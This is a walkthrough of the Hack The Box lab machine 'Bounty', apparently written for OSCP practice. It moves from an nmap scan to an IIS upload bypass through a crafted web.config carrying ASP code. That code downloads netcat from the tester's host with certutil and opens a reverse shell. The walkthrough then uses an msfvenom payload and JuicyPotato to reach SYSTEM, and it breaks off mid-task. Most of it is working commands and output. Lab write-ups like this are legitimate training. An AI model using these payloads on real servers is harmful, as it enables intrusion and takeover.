In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Sat Oct 21 00:25:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/bounty/results/10.10.10.93/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/bounty/results/10.10.10.93/scans/xml/_quick_tcp_nmap.xml 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-21 00:25:53 EDT for 34s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 7.5
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 21 00:26:27 2023 -- 1 IP address (1 host up) scanned in 41.48 seconds
checking the webpage we find a place we can upload files in 10.10.10.93/transfer.aspx
Tried to upload any file but looks like it only allows jpg or gif. tested with a jpeg.
Found that we can use web.conf
POC for this is
`<?``xml` `version``=``"1.0"` `encoding``=``"UTF-8"``?>`
`<``configuration``>`
`<``system.webServer``>`
`<``handlers` `accessPolicy``=``"Read, Script, Write"``>`
`<``add` `name``=``"web_config"` `path``=``"*.config"` `verb``=``"*"` `modules``=``"IsapiModule"` `scriptProcessor``=``"%windir%\system32\inetsrv\asp.dll"` `resourceType``=``"Unspecified"` `requireAccess``=``"Write"` `preCondition``=``"bitness64"` `/>`
`</``handlers``>`
`<``security``>`
`<``requestFiltering``>`
`<``fileExtensions``>`
`<``remove` `fileExtension``=``".config"` `/>`
`</``fileExtensions``>`
`<``hiddenSegments``>`
`<``remove` `segment``=``"web.config"` `/>`
`</``hiddenSegments``>`
`</``requestFiltering``>`
`</``security``>`
`</``system.webServer``>`
`</``configuration``>`
`<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!`
`<%`
`Response.write("-"&"->")`
`' it is running the ASP code if you can see 3 by opening the web.config file!`
`Response.write(1+2)`
`Response.write("<!-"&"-")`
`%>`
`-->`
Puting a command to download and execute reverse shell via netcat
Set cmd1 = wShell1.Exec("certutil.exe -urlcache -f -split http://10.10.14.4:90/nc.exe C:\users\public\Documents\nc.exe")
and
Set cmd1 = wShell1.Exec("cmd /c C:\Users\Public\Documents\nc.exe -e cmd 10.10.14.4 443")
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("certutil.exe -urlcache -f -split http://10.10.14.4:90/nc.exe C:\users\public\Documents\nc.exe")
Response.write(cmd1.StdOut.ReadAll())
%>
and
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c C:\Users\Public\Documents\nc.exe -e cmd 10.10.14.4 443")
Response.write(cmd2.StdOut.ReadAll())
%>
-->
set up a listener and run the second web.config after uploading it
We get a shell
╭─kali@kali ~/HTB/bounty
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.93] 49172
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
checking system info
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 10/22/2023, 3:55:54 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,635 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,656 MB
Virtual Memory: In Use: 439 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
checking whoami
c:\windows\system32\inetsrv>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>
Looks like a candidate for a Juicy Potato
Serve Juicy and a shell
Shell
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 -a x64 --platform windows LPORT=444 EXITFUNC=thread -f exe -o shell.exe 2 ↵
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
Got bot files in the machine
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
Set up a listener on 444 and run Juicy
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\Users\Public\Downloads>JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 444
JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 444
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
c:\Users\Public\Downloads>
We have admin
╰─$ nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.93] 49185
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
we cant get into any directory. Will move this into a new shell with netcat
╰─$ cd ../
╭─kali@kali ~/HTB/buff
╰─$ cp ~/exe/nc64.exe ./
╭─kali@kali ~/HTB/buff
╰─$ mv nc64.exe nc.exe
╭─kali@kali ~/HTB/buff
╰─$ serve 90
Starting HTTP server on port 90...
====================================
certutil -urlcache -f http://10.10.14.4:90/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.4:90/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 90 (http://0.0.0.0:90/) ...
and